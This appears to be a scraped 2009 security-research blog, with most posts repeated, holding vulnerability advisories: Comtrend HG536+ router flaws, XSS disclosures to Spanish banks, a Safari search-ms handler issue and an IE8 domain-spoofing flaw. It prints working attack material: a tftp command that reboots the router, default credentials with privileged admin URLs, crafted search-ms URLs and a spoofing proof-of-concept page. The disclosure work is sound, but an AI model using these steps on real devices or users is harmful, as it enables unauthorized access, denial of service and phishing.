La curiosidad es lo que hace mover la mente....
Comtrend HG536+ poligon firmware tftp vuln
Monday, June 15, 2009
##########################################
Comtrend HG536+ poligon firmware tftp vuln
Vendor url: www.comtrend.com
Vendor: www.adslzone.net/firmware-adslzone-poligon.html
Advisore Url:http://lostmon.blogspot.com/2009/06/
comtrend-hg536-poligon-firmware-tftp.html
Vendor notify: NO Exploit: see explanation.
#########################################
##############
History
##############
This is a extended research from those vulns =>
http://lostmon.blogspot.com/2009/04/comtrend-hg536-vulnerabilities.html
And =>
http://www.securityfocus.com/bid/32975
poligon firmware have all the same flaws.
#####################
Description By vendor
Comtrend
#####################
The HG536+ is an 802.11g (54Mbps) wireless and wired
Local Area Network (WLAN) ADSL router. Four 10/100
Base-T Ethernet ports provide wired LAN connectivity
with an integrated 802.11g WiFi WLAN Access Point for
wireless connectivity.
###################
Description poligon
firmware by adslzone
####################
Poligon ADSLzone comes from several firmwares manufacturers
and suppliers that use Internet (Asus, U.S. Robotics, Comm Net
, Broadcom, Deutsche Telekom, Alice Italy, Pirelli (Italy),
Bungury (Russia) and Vodafone (Thailand).
################
Vulnerabilities
################
This firmware have a flaw in tftp
service ,if a user have enable lan access
to tftp server and/or access from Wan ,
this router is prone vulnerable to a DoS
condition.
in the configuration file we can look for
services enabled at this line =>
---------------------------------------------------
srvCtrlList ftp="lan" http="lan" icmp="lan"
snmp="disable" ssh="disable" telnet="lan" tftp="lan"
----------------------------------------------------
in this case we have enabled tftp access from lan
oks create a new html file for example tweaking.html
(this file exists in poligon firmwares but you can use other
that´s have in yopur router in the /webs folder).
let´s try to upload it from my machine to /webs router folder
tftp -i 192.168.1.1 PUT c:\tweaking.html /webs
the file is aparently upload and the tftp server is configured
for reboot the router after upload finished.
Them i make the same test via Wan access and i have
the same result the router is reboot...
This can cause a DoS to a user , because a atacker
can force to reset all time, the victim´s router.
###############
versions
###############
Comtrend HG536+ router with this firmwares:
firmware Comtrend A101-302JAZ-C01_R05
firmware A101-302JAZ-C03_R14.A2pB021g.d15h
firmware Poligon, Release.0810b_1525 ADSLZONE v.1.10.08.11b (tftp issue)
##############
Solution
#############
No solution was available at this time.
by default this router is configured for
denied the access from WAN connections
But this style attack can be done if any
user is inside the LAN or if enable the
access from WAN for tftp service.
Configure to disable tftp and
Grant access to device ,only to trust users.
################# €nd #############
Thnx To Brink for test with me and for
his patience wen i reboot his router :P
Brinkxd@gmail.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Comtrend HG536+ poligon firmware tftp vuln
Vendor url: www.comtrend.com
Vendor: www.adslzone.net/firmware-adslzone-poligon.html
Advisore Url:http://lostmon.blogspot.com/2009/06/
comtrend-hg536-poligon-firmware-tftp.html
Vendor notify: NO Exploit: see explanation.
#########################################
##############
History
##############
This is a extended research from those vulns =>
http://lostmon.blogspot.com/2009/04/comtrend-hg536-vulnerabilities.html
And =>
http://www.securityfocus.com/bid/32975
poligon firmware have all the same flaws.
#####################
Description By vendor
Comtrend
#####################
The HG536+ is an 802.11g (54Mbps) wireless and wired
Local Area Network (WLAN) ADSL router. Four 10/100
Base-T Ethernet ports provide wired LAN connectivity
with an integrated 802.11g WiFi WLAN Access Point for
wireless connectivity.
###################
Description poligon
firmware by adslzone
####################
Poligon ADSLzone comes from several firmwares manufacturers
and suppliers that use Internet (Asus, U.S. Robotics, Comm Net
, Broadcom, Deutsche Telekom, Alice Italy, Pirelli (Italy),
Bungury (Russia) and Vodafone (Thailand).
################
Vulnerabilities
################
This firmware have a flaw in tftp
service ,if a user have enable lan access
to tftp server and/or access from Wan ,
this router is prone vulnerable to a DoS
condition.
in the configuration file we can look for
services enabled at this line =>
---------------------------------------------------
srvCtrlList ftp="lan" http="lan" icmp="lan"
snmp="disable" ssh="disable" telnet="lan" tftp="lan"
----------------------------------------------------
in this case we have enabled tftp access from lan
oks create a new html file for example tweaking.html
(this file exists in poligon firmwares but you can use other
that´s have in yopur router in the /webs folder).
let´s try to upload it from my machine to /webs router folder
tftp -i 192.168.1.1 PUT c:\tweaking.html /webs
the file is aparently upload and the tftp server is configured
for reboot the router after upload finished.
Them i make the same test via Wan access and i have
the same result the router is reboot...
This can cause a DoS to a user , because a atacker
can force to reset all time, the victim´s router.
###############
versions
###############
Comtrend HG536+ router with this firmwares:
firmware Comtrend A101-302JAZ-C01_R05
firmware A101-302JAZ-C03_R14.A2pB021g.d15h
firmware Poligon, Release.0810b_1525 ADSLZONE v.1.10.08.11b (tftp issue)
##############
Solution
#############
No solution was available at this time.
by default this router is configured for
denied the access from WAN connections
But this style attack can be done if any
user is inside the LAN or if enable the
access from WAN for tftp service.
Configure to disable tftp and
Grant access to device ,only to trust users.
################# €nd #############
Thnx To Brink for test with me and for
his patience wen i reboot his router :P
Brinkxd@gmail.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Caja Granada ha Parcheado Su web
Wednesday, June 10, 2009
###################################
Caja Granada ha Parcheado Su web
vendor Url:http://caja.caja-granada.es/
###################################
La web de La entidad bancaria Caja granada bajo uno
de sus diferentes dominios,se vio afectada por una
serie de errores de validacion de tipo Cross-site
scripting (XSS) y de tipo (CSRF)
Estas vulnerabilidades fueron descubiertas y
estudiadas por mi hasta descubrir las vulnerabilidades
o vectores de ataque, en la parte externa de la web;es
decir en la parte no autentificada de la web.
Las vulnerabilidades fueron reportados al equipo de seguridad
logica de La entidad, y al servicio de atencion al cliente,
despues del intercambio de unos mails, ha quedado parcheada
la parte mas critica de estas vulnerabilidades, la cual
permitia la inclusion de todo un sitio web bajo un frame
sobe el dominio principal de la entidad.
Caja Granada vuelve a ser segura en esos puntos reportados.
Ningun cliente de Caja granada pudo verse afectado , ya que
las comunicaciones se produjeron con absoluta discreccion
por ambas partes.
En el caso de la inclusion del sitio, ademas de haber sido
corregido , se nos muestra un mensage advirtiendonos de si
de verdad hemos accedido a esa url atraves del dominio de
caja Granada.
No se da ninguna prueba de cocepto por motivos evidentes.
Referencias :
http://caja.caja-granada.es
http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html
http://lostmon.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html
################## €nd ###################
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lost...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Caja Granada ha Parcheado Su web
vendor Url:http://caja.caja-granada.es/
###################################
La web de La entidad bancaria Caja granada bajo uno
de sus diferentes dominios,se vio afectada por una
serie de errores de validacion de tipo Cross-site
scripting (XSS) y de tipo (CSRF)
Estas vulnerabilidades fueron descubiertas y
estudiadas por mi hasta descubrir las vulnerabilidades
o vectores de ataque, en la parte externa de la web;es
decir en la parte no autentificada de la web.
Las vulnerabilidades fueron reportados al equipo de seguridad
logica de La entidad, y al servicio de atencion al cliente,
despues del intercambio de unos mails, ha quedado parcheada
la parte mas critica de estas vulnerabilidades, la cual
permitia la inclusion de todo un sitio web bajo un frame
sobe el dominio principal de la entidad.
Caja Granada vuelve a ser segura en esos puntos reportados.
Ningun cliente de Caja granada pudo verse afectado , ya que
las comunicaciones se produjeron con absoluta discreccion
por ambas partes.
En el caso de la inclusion del sitio, ademas de haber sido
corregido , se nos muestra un mensage advirtiendonos de si
de verdad hemos accedido a esa url atraves del dominio de
caja Granada.
No se da ninguna prueba de cocepto por motivos evidentes.
Referencias :
http://caja.caja-granada.es
http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html
http://lostmon.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html
################## €nd ###################
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lost...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Caixa Sabadell Parchea sus dominios web
Wednesday, June 03, 2009
#######################################
Caixa Sabadell Parchea sus dominios web
vendor: http://www.caixasabadell.es
#######################################
La web de Caixa Sabadell bajo dos de sus diferentes dominios,
se vio afectada por una serie de errores de validacion de tipo
Cross-site scripting (XSS).
Estas vulnerabilidades fueron descubiertas y estudiadas por mi
hasta descubrir las vulnerabilidades o vectores de ataque, en
la parte externa de la web;es decir en la parte no autentificada
de la web.
Las vulnerabilidades fueron reportados al equipo de seguridad
logica de La entidad, y al servicio de atencion al cliente,
Estas ediciones han sido solucionadas ya a dia de hoy, y asi
caixa Sabadell vuelve a ser segura en esos puntos reportados.
No se da ninguna prueba de cocepto por motivos evidentes.
Referencias :
http://www.caixasabadell.es
http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html
http://lostmon.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html
################## €nd ###################
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lost...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Caixa Sabadell Parchea sus dominios web
vendor: http://www.caixasabadell.es
#######################################
La web de Caixa Sabadell bajo dos de sus diferentes dominios,
se vio afectada por una serie de errores de validacion de tipo
Cross-site scripting (XSS).
Estas vulnerabilidades fueron descubiertas y estudiadas por mi
hasta descubrir las vulnerabilidades o vectores de ataque, en
la parte externa de la web;es decir en la parte no autentificada
de la web.
Las vulnerabilidades fueron reportados al equipo de seguridad
logica de La entidad, y al servicio de atencion al cliente,
Estas ediciones han sido solucionadas ya a dia de hoy, y asi
caixa Sabadell vuelve a ser segura en esos puntos reportados.
No se da ninguna prueba de cocepto por motivos evidentes.
Referencias :
http://www.caixasabadell.es
http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html
http://lostmon.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html
################## €nd ###################
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lost...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari 4 Automatic explorer.exe launch
Tuesday, May 12, 2009
###############################
Safari for windows automatic command line launch
advisory:http://lostmon.blogspot.com/
2009/05/safari-4-automatic-explorerexe-launch.html
vendor notify:yes
###############################
###########
Description
############
Safari 4 public beta (528.16) is prone vulnerable
to a local file comandline automatic launch.
I test it in windows vista & windows 7 rc
first take a look ..=>
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx#app_reg
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx#url_inv
In this documentation in "security alert" say :
"Applications handling URL protocols must be robust
in the face of malicious data.
Because handler applications receive data from untrusted
sources, the URL and other parameter values passed to
the application may contain malicious data attempting to
exploit the handling application. For this reason, handling
applications that could initiate unwanted actions based on
external data must first confirm those actions with the user"
Take a look, how to use search-ms protocol handler:
http://msdn.microsoft.com/en-us/library/bb266520.aspx
and
how to display windows objects in a command line :
http://www.codeproject.com/KB/system/ExplorerObjects.aspx
With all of this information a user can compose a html
document that call search-ms protocol handler , and use
some explorer objetcs.
########
testing
########
search-ms:query=microsoft&
search-ms:query=vacation&subquery=mydepartment.search-ms&
search-ms:query=seattle&crumb=kind:pics&
search-ms:query=seattle&crumb=folder:C:\MyFolder&
If you compose a html document with a iframe or a link that
contains any of those search-ms url firefox,google chrome,and
IE8 show a warning.( this is correct)but if you click in accept
it open explorer.exe and execute the search...
If you test the same with safari,this browser, opens
directly the iframe or the link without any prompt
or any warning.
If we look the implementation on this protocol handler,
and we look how to show explorer objects, we can compose
a "special" url that can contain explorer objects in
"location" parameter and we can launch explorer.exe that
can search in a determinate place of our machine.
for example :
search-ms:displayname=Search%20In%20Google.com&crumb=
location:%3A%3A{20D04FE0-3AEA-1069-A2D8-08002B30309D}
&stackedby=System.ItemTypeText&recurring:true
open explorer.exe , and close the tab where
explorer was called and close explorer.exe too
search-ms:displayname=Search%20In%20Google.com
&crumb=location:D%3A%5C&stackedby=System.ItemTypeText
&recurring:true
open explorer and explode the search box:
search-ms:displayname=%3D[]%20OR%20%3D%20OR%20%3D%20OR%20%3D&location:
the displayname param we can use it for spoof location,and
show for example in this case google.com (the victims can
think that the browser is searching in google.com)
If we put directly this url in the address bar of safari
this browser say , that it can´t open this url because
it don´t know the associate program.
But if we pass this ur in a iframe , safari don´t show
any warning and it execute this url and search withing
the files of the victim.
If we pass this url to Firefox , it show a warning , and
if we click in allow , this search is executed,if we pass
the url in a link or in a iframe the result is the same.
With Google Chrome if we pass the url to address bar,
Chrome search this url in google ( not affected directly)
but if we pass the url in a iframe or in a link , it show
a warning , click in allow and the search is executed.
with IE8 show a warning , but the search isn´t executed,
because it is incorrect to explorer, we can compose others
one. (it works too)
Wen explorer.exe is launching , the process is called with
this params:
this "injection" executes at commandline level =>
c:\windows\explorer.exe /separate,/idlist,%1,%L
I'm doing several test and try to obtain this other command line =>
c:\windows\explorer.exe /N,%windir%\system32,
/select,%windir%\system32\calc.exe
but at this moment i can't pass this command line in a
iframe with search-ms protocol.
¿ a remote user can collect the result of this local search ??
i don,t know any way to do it; but for example we can cause a
DoS to explorer if compose a HTML document with tree or four
iframes that call search-ms and it can use tu turn slow the
PC or for abuse of te search indexer or explorer.exe
A link with only put the protocol search-ms: with tree
or four explorer windows , it can be abuse of memory ,
and in some cases eplorer.exe crashes.
I exchange some mails whith MSRC (microsoft) and
the and i in the final conclusion , we think that at
this moment this not supose a security vulnerability
in IE8 , because it show the warnig , and we don´t have
found a vector to attack or to bypass the restrintions on
the search-ms implementation to turn it in a Remote command
execution or remote code execution.
This is the final response from Microsoft:
#######################################
We have completed our investigation into this issue
and believe there is not a security issue here for
Microsoft to address. Our investigation has not shown
any method whereby a search-ms URL could either execute
arbitrary code or return search results to a third party.
Although additional search windows can be generated from
multiple iframe on a web page, this is a temporary DoS
condition. We can find no security issue with the search-ms
protocol itself. As such, this is not something MSRC would track.
Please let me know if you feel we have missed something
in our analysis. Otherwise, I will be closing the MSRC
case down. I do appreciate you taking the time to report
this to us and working with us throughout the investigation.
########################################
but if we remember wen we call search-ms protocol
in a web page it executes this:
c:\windows\explorer.exe /separate,/idlist,%1,%L
them .. at this moment it isn´t a vulnerability in IE
but i think that this issue need to be track ...
###############€nd#####################
Thnx to estrella to be my ligth
Thnx to all Lostmon Team !!
Thnx The Microsoft Research Security Center
for their support. http://blogs.technet.com/msrc/
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari for windows automatic command line launch
advisory:http://lostmon.blogspot.com/
2009/05/safari-4-automatic-explorerexe-launch.html
vendor notify:yes
###############################
###########
Description
############
Safari 4 public beta (528.16) is prone vulnerable
to a local file comandline automatic launch.
I test it in windows vista & windows 7 rc
first take a look ..=>
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx#app_reg
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx#url_inv
In this documentation in "security alert" say :
"Applications handling URL protocols must be robust
in the face of malicious data.
Because handler applications receive data from untrusted
sources, the URL and other parameter values passed to
the application may contain malicious data attempting to
exploit the handling application. For this reason, handling
applications that could initiate unwanted actions based on
external data must first confirm those actions with the user"
Take a look, how to use search-ms protocol handler:
http://msdn.microsoft.com/en-us/library/bb266520.aspx
and
how to display windows objects in a command line :
http://www.codeproject.com/KB/system/ExplorerObjects.aspx
With all of this information a user can compose a html
document that call search-ms protocol handler , and use
some explorer objetcs.
########
testing
########
search-ms:query=microsoft&
search-ms:query=vacation&subquery=mydepartment.search-ms&
search-ms:query=seattle&crumb=kind:pics&
search-ms:query=seattle&crumb=folder:C:\MyFolder&
If you compose a html document with a iframe or a link that
contains any of those search-ms url firefox,google chrome,and
IE8 show a warning.( this is correct)but if you click in accept
it open explorer.exe and execute the search...
If you test the same with safari,this browser, opens
directly the iframe or the link without any prompt
or any warning.
If we look the implementation on this protocol handler,
and we look how to show explorer objects, we can compose
a "special" url that can contain explorer objects in
"location" parameter and we can launch explorer.exe that
can search in a determinate place of our machine.
for example :
search-ms:displayname=Search%20In%20Google.com&crumb=
location:%3A%3A{20D04FE0-3AEA-1069-A2D8-08002B30309D}
&stackedby=System.ItemTypeText&recurring:true
open explorer.exe , and close the tab where
explorer was called and close explorer.exe too
search-ms:displayname=Search%20In%20Google.com
&crumb=location:D%3A%5C&stackedby=System.ItemTypeText
&recurring:true
open explorer and explode the search box:
search-ms:displayname=%3D[]%20OR%20%3D%20OR%20%3D%20OR%20%3D&location:
the displayname param we can use it for spoof location,and
show for example in this case google.com (the victims can
think that the browser is searching in google.com)
If we put directly this url in the address bar of safari
this browser say , that it can´t open this url because
it don´t know the associate program.
But if we pass this ur in a iframe , safari don´t show
any warning and it execute this url and search withing
the files of the victim.
If we pass this url to Firefox , it show a warning , and
if we click in allow , this search is executed,if we pass
the url in a link or in a iframe the result is the same.
With Google Chrome if we pass the url to address bar,
Chrome search this url in google ( not affected directly)
but if we pass the url in a iframe or in a link , it show
a warning , click in allow and the search is executed.
with IE8 show a warning , but the search isn´t executed,
because it is incorrect to explorer, we can compose others
one. (it works too)
Wen explorer.exe is launching , the process is called with
this params:
this "injection" executes at commandline level =>
c:\windows\explorer.exe /separate,/idlist,%1,%L
I'm doing several test and try to obtain this other command line =>
c:\windows\explorer.exe /N,%windir%\system32,
/select,%windir%\system32\calc.exe
but at this moment i can't pass this command line in a
iframe with search-ms protocol.
¿ a remote user can collect the result of this local search ??
i don,t know any way to do it; but for example we can cause a
DoS to explorer if compose a HTML document with tree or four
iframes that call search-ms and it can use tu turn slow the
PC or for abuse of te search indexer or explorer.exe
A link with only put the protocol search-ms: with tree
or four explorer windows , it can be abuse of memory ,
and in some cases eplorer.exe crashes.
I exchange some mails whith MSRC (microsoft) and
the and i in the final conclusion , we think that at
this moment this not supose a security vulnerability
in IE8 , because it show the warnig , and we don´t have
found a vector to attack or to bypass the restrintions on
the search-ms implementation to turn it in a Remote command
execution or remote code execution.
This is the final response from Microsoft:
#######################################
We have completed our investigation into this issue
and believe there is not a security issue here for
Microsoft to address. Our investigation has not shown
any method whereby a search-ms URL could either execute
arbitrary code or return search results to a third party.
Although additional search windows can be generated from
multiple iframe on a web page, this is a temporary DoS
condition. We can find no security issue with the search-ms
protocol itself. As such, this is not something MSRC would track.
Please let me know if you feel we have missed something
in our analysis. Otherwise, I will be closing the MSRC
case down. I do appreciate you taking the time to report
this to us and working with us throughout the investigation.
########################################
but if we remember wen we call search-ms protocol
in a web page it executes this:
c:\windows\explorer.exe /separate,/idlist,%1,%L
them .. at this moment it isn´t a vulnerability in IE
but i think that this issue need to be track ...
###############€nd#####################
Thnx to estrella to be my ligth
Thnx to all Lostmon Team !!
Thnx The Microsoft Research Security Center
for their support. http://blogs.technet.com/msrc/
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Comtrend HG536+ vulnerabilities
Monday, April 27, 2009
##########################################
Comtrend HG536+ vulnerabilities
Vendor url:www.comtrend.com
Advisore Url:http://lostmon.blogspot.com/2009/04/
comtrend-hg536-vulnerabilities.html
Vendor notify: NO
#########################################
These Flaws are discovered before by Isecauditors
sorry for the inconvenience...
#####################
Description By vendor
#####################
The HG536+ is an 802.11g (54Mbps) wireless and wired
Local Area Network (WLAN) ADSL router. Four 10/100
Base-T Ethernet ports provide wired LAN connectivity
with an integrated 802.11g WiFi WLAN Access Point for
wireless connectivity.
################
Vulnerabilities
################
this device is by default with this settings:
==========================================
l LAN port IP address: 192.168.1.1
l Local administrator account name: admin
l Local administrator account password: admin
l Local non- administrator account name: user
l Local non- administrator account password: user
l Remote WAN access: disabled
l Remote WAN access account name: support
l Remote WAN access account password: support
l NAT: enable and firewall: disable
l DHCP server on LAN interface: enable
l WAN IP address: none
============================================
All Of this flaws are because the access control
is based in a ineffective javascript control in
'menuBcm.js' file that enables or disables view
items in the menu.html file, according of user
was logged in.
For this reason a minimal user , can call directly
all pages,that are parts of the web interface
bypassing the "pseudo restrictions" access role.
for exploit all flaws , a minimal account credentials
are required.
Vuln 1 => access Control error
if a user has access to non administrator user
by entering username "user" and password "user"
with this user only can update the firmware , manage
SNMP ,and view some status in the router ,and do
diagnostics , about adsl connectivity.This user
aparently is "restricted" to take some actions.
This router in this firmware version , has a
access control error and a user without privileges
( user-user) can access to all functions if he
make a direct request to the interested file or
functions.
example :
this user has no access to manage the setup of router
but by entering http://192.168.1.1/wancfg.cmd
he can configure the WAN settings.
download the config =>
http://192.168.1.1/backupsettings.html
view wireless key =>
http://192.168.1.1/wlsecurity.html
Vuln 2 => clear text admin passwords disclosure.
login in the router with user -user account
and open http://192.168.1.1/password.html
try to view the source code...
in the source we found :
=======================
pwdAdmin = 'admin';
pwdSupport = 'support;
pwdUser = 'user';
=======================
###############
versions
###############
Comtrend HG536+
firmware A101-302JAZ-C03_R14.A2pB021g.d15h
##############
Solution
#############
No solution was available at this time.
by default this router is configured for
denied the access from WAN connections
But this style attack can be done if any
user is inside the LAN or if enable the
access from WAN.
configure to deny Wan connections and
Grant access to device ,only to trust users.
################# €nd #############
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Comtrend HG536+ vulnerabilities
Vendor url:www.comtrend.com
Advisore Url:http://lostmon.blogspot.com/2009/04/
comtrend-hg536-vulnerabilities.html
Vendor notify: NO
#########################################
These Flaws are discovered before by Isecauditors
see http://www.securityfocus.com/bid/32975
sorry for the inconvenience...
#####################
Description By vendor
#####################
The HG536+ is an 802.11g (54Mbps) wireless and wired
Local Area Network (WLAN) ADSL router. Four 10/100
Base-T Ethernet ports provide wired LAN connectivity
with an integrated 802.11g WiFi WLAN Access Point for
wireless connectivity.
################
Vulnerabilities
################
this device is by default with this settings:
==========================================
l LAN port IP address: 192.168.1.1
l Local administrator account name: admin
l Local administrator account password: admin
l Local non- administrator account name: user
l Local non- administrator account password: user
l Remote WAN access: disabled
l Remote WAN access account name: support
l Remote WAN access account password: support
l NAT: enable and firewall: disable
l DHCP server on LAN interface: enable
l WAN IP address: none
============================================
All Of this flaws are because the access control
is based in a ineffective javascript control in
'menuBcm.js' file that enables or disables view
items in the menu.html file, according of user
was logged in.
For this reason a minimal user , can call directly
all pages,that are parts of the web interface
bypassing the "pseudo restrictions" access role.
for exploit all flaws , a minimal account credentials
are required.
Vuln 1 => access Control error
if a user has access to non administrator user
by entering username "user" and password "user"
with this user only can update the firmware , manage
SNMP ,and view some status in the router ,and do
diagnostics , about adsl connectivity.This user
aparently is "restricted" to take some actions.
This router in this firmware version , has a
access control error and a user without privileges
( user-user) can access to all functions if he
make a direct request to the interested file or
functions.
example :
this user has no access to manage the setup of router
but by entering http://192.168.1.1/wancfg.cmd
he can configure the WAN settings.
download the config =>
http://192.168.1.1/backupsettings.html
view wireless key =>
http://192.168.1.1/wlsecurity.html
Vuln 2 => clear text admin passwords disclosure.
login in the router with user -user account
and open http://192.168.1.1/password.html
try to view the source code...
in the source we found :
=======================
pwdAdmin = 'admin';
pwdSupport = 'support;
pwdUser = 'user';
=======================
###############
versions
###############
Comtrend HG536+
firmware A101-302JAZ-C03_R14.A2pB021g.d15h
##############
Solution
#############
No solution was available at this time.
by default this router is configured for
denied the access from WAN connections
But this style attack can be done if any
user is inside the LAN or if enable the
access from WAN.
configure to deny Wan connections and
Grant access to device ,only to trust users.
################# €nd #############
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Thursday, March 05, 2009
###########################################
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Vendor page: www.microsoft.com
Advisore:http://lostmon.blogspot.com/
2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html
vendor notify:yes exploit available:yes
############################################
Internet explorer 8 has a flaw that allows remote users to
spooff the domain name in 'ieframe.dll' wen is set to
'acr_error.htm' in res: uri handler a remote user can
compose a Bad link thats shows in domain name for example
google.com , but wen click in the link it goes to other
site (spooffing)
#################
Proof of concept
#################
#######################################
Thnx To estrella to be my ligth
Thnx to all Lostmon Team.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Vendor page: www.microsoft.com
Advisore:http://lostmon.blogspot.com/
2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html
vendor notify:yes exploit available:yes
############################################
Internet explorer 8 has a flaw that allows remote users to
spooff the domain name in 'ieframe.dll' wen is set to
'acr_error.htm' in res: uri handler a remote user can
compose a Bad link thats shows in domain name for example
google.com , but wen click in the link it goes to other
site (spooffing)
#################
Proof of concept
#################
<html>
<head>
<script type="text/javascript">
function open_win()
{
window.open("res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no");
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>
<body>
<form>
<input type="button" value="Open Window" onclick="open_win()">
</form>
</body>
</html>
#######################################
Thnx To estrella to be my ligth
Thnx to all Lostmon Team.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Entidades bancarias españolas ante el phishing II
Saturday, February 21, 2009
#######################################
Entidades bancarias españolas ante el phishing II
#######################################
Este articulo es una segunda parte de este otro:
La banca española ante el phishing
Despues del estudio realizado sobre el estado
de la banca española ante el phishing,me gustaria
decir como ha sido la relacion y que ha pasado
despues de ese articulo.
Se ha intentando notificar a las entidades afectadas
Los problemas encontrados en sus webs , atraves de los
cuales atacantes remotos podrian intentar lanzar ataques
de phishing sobre las mimas webs de estas entidades.
Para la decepcion general,ha sido una minoria de las
entidades afectadas las que han contentado o se han
interesado por saber algunoslos posibles puntos flacos
de sus webs.
No se les ha pedido nada mas que parchearan sus webs
y se les ha ofrecido ayuda y orientacion ,asi como
el reporte de todos las vulnerabilidades encontradas,
y siendo todo esto ofrecido sin ningun animo de lucro.
En vista del poco interes prestado, lo mas logico es
poner una señal de stop y hacer una reflexion seria
sobre si tan seguros son los servicios que nos ofrecen
como se empeñan en mostrarnos en sellos y sellos de calidad
y garantia.
Casi todos suelen escudarse en que por falta de tiempo se
sacan a produccion partes o proyectos que no han sido aun
bien probados o testeados a fondo....
No deberian Antes de hacer eso , testear y retestear , para
no poner en peligro otras partes dela web?.
No revelo las vulnerabilidades por motivos obvios
aunque si podeis ver unas capturas como prueba del
concepto(he borrado la informacion destacada de las URL)
y dire que pero entre ellas se haya una muy grave la cual
la entidad afetada deberia correjir cuanto antes;
pues permite la inclusion de todo un sitio web
bajo un frame en su dominio, las demas son agujeros
xss y sql injection , asi como algun escape de
informacion suficiente para lanzar un aatque de tipo
ingenieria social.
Me dejo dos en el tintero que son las que parecen
dispuestas aparchear y merecen su tiempo para ello
al menos por el interes prestado.
Las entidades afectadas son :
##############
servicaixa
##############
http://www.servicaixa.com
###########
sa nostra
###########
www.sanostra.es
###############
caixa sabadell
###############
http://www.caixasabadell.com
Esta entidad Ya ha solucionado Sus Dos
agujeros y vuelve a ser segura en esos puntos.
##################
caixa manresa
##############
http://www.caixamanresa.es
###########
caja duero
###########
https://www.cajaduero.es
###########
cajasol
###########
http://www.cajasol.es
##############
deutsche-bank
###############
http://www.deutsche-bank.es
#####################
kutxa.net
####################
http://www.kutxa.net
se les notifico un agujero xss
concretamente un XSS persistente
y este ha sido ya pacheado.
###########
Banesto
############
http://www.banesto.es
###################
banco santander:
###################
https://www.bancosantander.es
###########
cajastur
###########
http://www.cajastur.es
################€nd###################
--
atentamente:
Lostmon (Lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group:http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Entidades bancarias españolas ante el phishing II
#######################################
Este articulo es una segunda parte de este otro:
La banca española ante el phishing
Despues del estudio realizado sobre el estado
de la banca española ante el phishing,me gustaria
decir como ha sido la relacion y que ha pasado
despues de ese articulo.
Se ha intentando notificar a las entidades afectadas
Los problemas encontrados en sus webs , atraves de los
cuales atacantes remotos podrian intentar lanzar ataques
de phishing sobre las mimas webs de estas entidades.
Para la decepcion general,ha sido una minoria de las
entidades afectadas las que han contentado o se han
interesado por saber algunoslos posibles puntos flacos
de sus webs.
No se les ha pedido nada mas que parchearan sus webs
y se les ha ofrecido ayuda y orientacion ,asi como
el reporte de todos las vulnerabilidades encontradas,
y siendo todo esto ofrecido sin ningun animo de lucro.
En vista del poco interes prestado, lo mas logico es
poner una señal de stop y hacer una reflexion seria
sobre si tan seguros son los servicios que nos ofrecen
